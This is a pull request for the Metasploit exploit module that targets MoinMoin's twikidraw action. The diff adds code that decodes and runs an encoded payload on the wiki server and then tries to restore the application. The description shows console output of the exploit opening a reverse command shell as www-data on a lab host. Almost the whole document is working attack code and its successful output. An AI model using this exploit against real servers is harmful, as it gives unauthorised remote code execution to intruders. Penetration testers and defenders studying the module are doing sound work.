### PR TITLE
Try restore MoinMoin also at exploiting time

### DIFF
--- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb
+++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb
@@ -217,7 +217,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		return true
 	end
 
-
 	def exploit
 
 		# Init variables
@@ -250,7 +249,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Upload payload
 		print_status("Trying to upload payload...")
-		python_cmd = "import os\nos.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))"
+		python_cmd = "import sys, os\n"
+		python_cmd << "os.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))\n"
+		python_cmd << "sys.path.insert(0, '/usr/local/share/moin')\n"
+		python_cmd << "from MoinMoin.web.serving import make_application\n"
+		python_cmd << "application = make_application(shared=True)"
 		res = upload_code(session, "exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))")
 		if not res
 			fail_with(Exploit::Failure::Unknown, "Error uploading the payload")


### PR DESCRIPTION
As pointed by @jlee-r7, trying to restore the application also at exploiting time helps with the exploit confidence. Thanks for the hint! Since the installation path must be known, restoring at exploiting time is difficult. At the moment the module just tries to restore with the default installation path.

In the worse case the application is broken anyway. In the best case you get a little more confident exploit :) The ManualRanking remains. Also the post exploitation task.

Exploit working after changes:

```
msf exploit(moinmoin_twikidraw) > rexploit
[*] Reloading module...

[*] Using anonymous access...
[*] Started reverse double handler
[*] Trying to upload payload...
[*] Executing the payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo yrRkLuZdQxR97K1B;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "yrRkLuZdQxR97K1B\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.240:41212) at 2013-06-19 11:23:43 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

```
